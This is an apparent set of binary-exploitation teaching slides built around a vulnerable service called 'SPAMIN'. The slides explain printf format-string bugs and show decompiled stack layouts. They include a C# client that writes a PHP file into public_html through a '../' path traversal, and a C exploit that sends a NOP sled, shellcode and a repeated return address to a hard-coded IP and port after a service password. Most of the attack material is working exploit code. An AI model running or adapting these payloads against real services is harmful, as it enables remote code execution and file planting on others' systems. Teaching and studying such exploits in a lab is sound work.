SPAMIN Binary Hacking

SPAMIN Binary Hacking. Tools IDA + Hex Rays hexeditor WinSCP Putty telnet Visual Studio Wireshark (Optional)



Page 1

SPAMIN

Binary Hacking

Page 2

Tools

• IDA + Hex Rays
• hexeditor
• WinSCP
• Putty
• telnet
• Visual Studio
• Wireshark (Optional)

Page 5

Do not pirate

• http://www.hex-rays.com/idapro/hallofshame.html

Page 6

Begin Demo

• SSH into and browse service
• netstat -anp
• telnet
• observe
• attempt exploit – optional
• reverse engineer
• exploit more
• patch

Page 7

printf format string attack

int printf(const char *format, ...); /* variadic: the conversions inside format decide how many further arguments are read off the call */

/* Correct uses: the format is a string literal and the argument count matches the conversions (one %s; one %s plus three %x). */
printf(“%s”, str1);printf(“%s, %x, %x, %x”, str1, x, y, z);

3

“%x %x %x”

1

2

printf(“%x %x %x”,1,2,3);

/* The vulnerable pair: gets() has no bound on str1, and str1 is then passed as the format itself, so any %x/%n conversions in the input are interpreted (see the %n note below). Fix: read with fgets(str1, sizeof str1, stdin) (if str1 is an array) and print with printf("%s", str1). */
gets(str1);printf(str1);

%n The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted

Page 8

C#

// Client for the service at the host and port given on the slide; each Write() below is one line of the protocol as the slide presents it. The server side is not shown.
TcpClient client = new TcpClient("128.198.60.73", 8008);

StreamWriter streamWriter = new StreamWriter(client.GetStream());

// Line 1 is the same string the C client on the later slides sends as `pass`; line 2 is a relative path containing "..", which suggests the service does not confine client-supplied file names — verify against the server code.
streamWriter.Write("SPAM-IN-SPAM-OUT\n");streamWriter.Write("../public_html/fun.php\n");

// Line 3 is the file contents; Flush() pushes the buffered writes onto the socket.
streamWriter.Write("<?php phpinfo(); ?>\n");streamWriter.Flush();

Page 9

format

file contents

filename

512

512

512

0x200

0x200

0x200

0x62C

0xbffff178

0xbfffffff

stuff

Page 10

Gets Shell Code

• http://www.linux-secure.com/endymion/shellcodes/archive/linux-x86-mkdir1.c

NOP

Shell Code

RA

buffer

Page 11

#include <winsock.h>

int sock; /* Socket descriptor */
struct sockaddr_in mySockAddr; /* server address */
WSADATA wsaData; /* Structure for WinSock setup communication */

if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) /* Load Winsock 2.0 DLL */
{
fprintf(stderr, "WSAStartup() failed");
exit(1);
}

/* NOTE(review): only WSAStartup() is checked; socket() and connect() results are ignored, so a failure here still reaches send() below with an unusable descriptor. */
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
memset(&mySockAddr, 0, sizeof(mySockAddr));
mySockAddr.sin_family = AF_INET;
mySockAddr.sin_addr.s_addr = inet_addr("128.198.60.73"); /* hard-coded address from the slide; inet_addr() reports a bad string only via INADDR_NONE, which is not checked */
mySockAddr.sin_port = htons(8008);
connect(sock, (struct sockaddr *) &mySockAddr, sizeof(mySockAddr));

/* pass is not declared in this fragment; a later slide shows it as "SPAM-IN-SPAM-OUT\n" (16 characters plus newline), which is where the hard-coded 17 comes from. */
send(sock,pass,17,0);

Page 12

C# != C

Page 13

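/* Hex-Rays local-variable listing for the decompiled function. The slide collapsed it onto one line, which turned everything after the first "//" into a comment; restored here one declaration per line. The bracketed annotations are the decompiler's stack offsets: format, filedata and filename sit 0x200 (512) bytes apart, matching the 512-byte buffers drawn on the stack diagram — they are presumably arrays that the decompiler shows as single chars. */
unsigned __int8 isStringLess; // cf@1
unsigned __int8 isStringEqual; // zf@1
signed int v4; // ecx@1
int spamString2; // edi@1
char *userInput1; // esi@1
int result; // eax@6
char v8; // [sp-10h] [bp-648h]@1
char v9; // [sp+0h] [bp-638h]@1
char *v10; // [sp+Ch] [bp-62Ch]@16
int v11; // [sp+10h] [bp-628h]@1
int spamString1; // [sp+14h] [bp-624h]@1
char *v13; // [sp+18h] [bp-620h]@1
__int16 v14; // [sp+1Ch] [bp-61Ch]@1
char format; // [sp+28h] [bp-610h]@1
char filedata; // [sp+228h] [bp-410h]@12
char filename; // [sp+428h] [bp-210h]@9
int v18; // [sp+628h] [bp-10h]@1
FILE *stream; // [sp+62Ch] [bp-Ch]@1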

format

file contents

filename

Other Local Function Variable

Other Local Function Variable

512

512

512

0x200

0x200

0x200

0x62C

Save Register (Prologue) ebp

RA

3

Save Register (Prologue) ebp

Save Registers

0xbffffb10

744

0xbfffffff

printf parameters

RA

process message

main

nop

shellcode

RA (repeated)

printf

“%x %x %x”

1

2

printf(“%x %x %x”,1,2,3);

Page 14

• C# attack
• fork -- remote gdbserver
• gdb ./spamin PID
• x /1000w 0xbfffffff – use offset found in printf

attack

• gdbserver demo

Page 15

int sock; /* Socket descriptor */
struct sockaddr_in mySockAddr; /* Echo server address */
char *pass = "SPAM-IN-SPAM-OUT\n"; /* 16 characters plus newline: the 17 passed to send() below */
char payload [2500]; /* never initialised as a whole; only the bytes written below are defined */
WSADATA wsaData; /* Structure for WinSock setup communication */

if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) /* Load Winsock 2.0 DLL */
{
fprintf(stderr, "WSAStartup() failed");
exit(1);
}

/* NOTE(review): as on the earlier slide, socket() and connect() return values are not checked. */
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
memset(&mySockAddr, 0, sizeof(mySockAddr));
mySockAddr.sin_family = AF_INET;
mySockAddr.sin_addr.s_addr = inet_addr("128.198.60.73");
mySockAddr.sin_port = htons(8008);
connect(sock, (struct sockaddr *) &mySockAddr, sizeof(mySockAddr));

int nopLength = 300;
int length = 700; /* number of payload bytes actually sent; the fill loop below is not bounded by it */

memset(payload, '\x90', nopLength); // Create the nop sled in the payload
/* sc is not declared in this fragment; sizeof(sc) only measures the data if sc is an array, not a pointer. */
memcpy(&payload[nopLength],sc,sizeof(sc)); // Copy the shellcode into payload

for (int j=0; j < 1500; j+= 4) // Copy the RA into the payload
{
int r = nopLength + sizeof(sc) -1; /* loop-invariant; the -1 drops the trailing byte of sc */
/* NOTE(review): the final iteration writes payload[r+1499..r+1502]; with r = 299 + sizeof(sc) that exceeds the 2500-byte buffer unless sizeof(sc) <= 701, a bound this fragment does not establish. */
memcpy(&payload[r+j], "\x20\xfb\xff\xbf", 4);
}

payload[length-1] = '\n'; /* terminates the record with a newline, consistent with the line-per-field protocol the C# slide shows */

send(sock,pass,17,0);
send(sock, payload, length, 0);
send(sock,pass,17,0);